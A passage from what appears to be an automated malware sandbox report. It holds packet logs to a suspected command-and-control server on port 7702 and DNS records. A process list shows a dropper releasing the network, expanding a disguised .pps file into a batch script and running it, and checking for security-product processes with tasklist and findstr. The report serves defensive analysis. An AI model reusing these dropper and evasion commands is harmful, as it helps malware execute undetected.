                                                                                                      Mar 3, 2025 13:26:34.174129009 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174129963 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.174144030 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.174160957 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.174205065 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.178740978 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.178800106 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179089069 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179135084 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179160118 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179204941 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179249048 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179261923 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179284096 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.179301023 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.179368019 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.223268032 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.223413944 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.275222063 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.277436972 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.327259064 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.328418016 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.376296043 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.376566887 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:34.423243046 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:34.579886913 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.181710005 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.186752081 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.190345049 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.195352077 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.570349932 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.570477009 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575511932 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575620890 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575661898 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575700045 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575717926 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575726032 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575736046 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575763941 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575783014 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575828075 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575854063 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575885057 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575901031 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575920105 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575944901 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575954914 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575962067 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575978994 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.575993061 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.575994015 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576010942 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576026917 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576034069 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576042891 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576049089 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576060057 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576100111 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576118946 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576127052 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576136112 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576165915 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576168060 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576181889 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576183081 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576198101 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576214075 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576227903 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576231956 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576241016 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576247931 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576262951 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.576288939 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.576319933 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581532001 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581568003 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581585884 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581602097 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581619024 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581623077 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581635952 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581651926 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581656933 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581698895 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581702948 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581720114 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581734896 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581753969 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581760883 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581775904 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581787109 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581792116 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581799984 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581840038 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581842899 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581856966 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581872940 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581887007 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581891060 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581926107 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581926107 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581938982 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581940889 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.581974030 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.581980944 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582006931 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582007885 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.582043886 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.582062006 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.582068920 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582086086 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582108021 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582119942 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.582144976 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.582149982 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582180977 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:35.582185984 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582214117 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582231045 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582247972 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.582266092 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587497950 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587536097 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587565899 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587644100 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587658882 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587675095 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587690115 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587708950 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587724924 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587793112 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587820053 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587837934 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587877035 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.587990046 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588021040 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588088036 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588118076 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588145971 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588170052 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588212013 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588227987 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588361025 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588377953 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588393927 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588409901 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588426113 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:35.588442087 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.101403952 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:36.108207941 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.108313084 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:36.115236998 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.392843962 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.443671942 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:36.522042990 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.568695068 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:36.637198925 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.641520023 CET499757702192.168.2.551.81.129.243
                                                                                                      Mar 3, 2025 13:26:36.646748066 CET77024997551.81.129.243192.168.2.5
                                                                                                      Mar 3, 2025 13:26:36.646823883 CET499757702192.168.2.551.81.129.243

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 3, 2025 13:25:52.864008904 CET5406253192.168.2.51.1.1.1
                                                                                                      Mar 3, 2025 13:25:52.872930050 CET53540621.1.1.1192.168.2.5
                                                                                                      Mar 3, 2025 13:26:33.552191973 CET5665953192.168.2.51.1.1.1
                                                                                                      Mar 3, 2025 13:26:33.560467005 CET53566591.1.1.1192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Mar 3, 2025 13:25:52.864008904 CET192.168.2.51.1.1.10xe2fStandard query (0)kurNPdkiGq.kurNPdkiGqA (IP address)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:26:33.552191973 CET192.168.2.51.1.1.10x64ddStandard query (0)78.210.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Mar 3, 2025 13:25:37.144628048 CET1.1.1.1192.168.2.50xa83fNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:25:37.144628048 CET1.1.1.1192.168.2.50xa83fNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:25:40.345818996 CET1.1.1.1192.168.2.50x341bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:25:40.345818996 CET1.1.1.1192.168.2.50x341bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:25:52.872930050 CET1.1.1.1192.168.2.50xe2fName error (3)kurNPdkiGq.kurNPdkiGqnonenoneA (IP address)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:26:33.560467005 CET1.1.1.1192.168.2.50x64ddName error (3)78.210.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:26:39.199778080 CET1.1.1.1192.168.2.50x5d09No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                      Mar 3, 2025 13:26:39.199778080 CET1.1.1.1192.168.2.50x5d09No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:07:25:26
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Users\user\Desktop\00000123.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\00000123.exe"
                                                                                                      Imagebase:0xee0000
                                                                                                      File size:3'520'000 bytes
                                                                                                      MD5 hash:20AB8D93805914EE4E7C7953B15928A5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2569244195.0000000008160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:07:25:27
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                                      Imagebase:0x790000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:07:25:27
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:07:25:28
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:ipconfig /release
                                                                                                      Imagebase:0x250000
                                                                                                      File size:29'184 bytes
                                                                                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:07:25:41
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\update.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1'506'576 bytes
                                                                                                      MD5 hash:5A69E7FBEB1781A8AB7F77E74CABDB96
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:07:25:43
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                                                                                                      Imagebase:0x790000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:07:25:43
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:07:25:43
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\expand.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:expand Expensive.pps Expensive.pps.bat
                                                                                                      Imagebase:0x230000
                                                                                                      File size:53'248 bytes
                                                                                                      MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:07:25:44
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist
                                                                                                      Imagebase:0x200000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:07:25:44
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:07:25:46
                                                                                                      Start date:03/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32b